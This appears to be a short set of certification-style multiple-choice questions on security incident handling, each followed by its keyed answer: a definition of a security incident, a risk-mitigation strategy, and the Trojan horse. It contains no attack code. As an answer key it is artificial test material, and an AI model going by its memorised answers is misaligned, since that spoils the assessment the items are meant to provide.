Mysoft, a major software developer located out of New Jersey, realized that sensitive information from folders shared across its network is being accessed by unauthorized people and leaked to third parties, which could result in huge financial losses for the organization. In this context, which of the following statements most appropriately defines “computer security incident”?
Events related to physical security incidents and troubleshooting issues in corporate networks
Any real or suspected adverse event in relation to the security of computer systems or networks
Policies guaranteeing access to information system resources
Rectifying the loss of information that may affect the investment of the organization in different business activities
Any real or suspected adverse event in relation to the security of computer systems or networks
Risk mitigation strategy determines the circumstances under which an action has to be taken to minimize and overcome risks. An organization that absorbs minor risks while preparing to respond to major risks relates to which risk mitigation strategy?
Risk limitation
Risk avoidance
Risk absorption
Risk assumption
Risk absorption
Identify the malicious program that is masked as a genuine harmless program, and gives the attacker unrestricted access to the user’s information and system. These programs may unleash dangerous programs that may erase the unsuspecting user’s disk, and send the victim’s credit card numbers and passwords to a stranger.
Cookie tracker
Worm
Virus
Trojan
Trojan